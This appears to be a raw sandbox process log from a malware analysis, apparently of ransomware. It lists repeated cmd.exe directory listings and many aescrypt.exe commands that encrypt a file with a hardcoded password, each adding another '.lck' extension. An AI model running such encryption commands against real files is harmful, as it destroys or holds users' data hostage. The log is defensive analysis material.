- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5324
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5364
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5376
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5420
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5444
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5488
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5512
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5524
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5580
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5584
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5628
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5660
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5680
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5740
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5780
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5812
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4928
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:3800
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5944
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5896
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5932
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:6028
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:6012
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5960
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6000
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5956
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6076
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6080
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6112
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4468
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5164
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5144
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6132
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5156
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:3748
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:1212
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5240
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5276
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5200
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5176
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5296
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5316
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5324
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5404
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5460
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5472
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5540
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5588
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4680
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4660
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5732
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5924
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:2360
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5880
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5916
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5920
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:6044
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5972
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6024
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6056
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4636
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3116
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4100
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3272
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5160
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5128
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5156
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3172
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5236
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
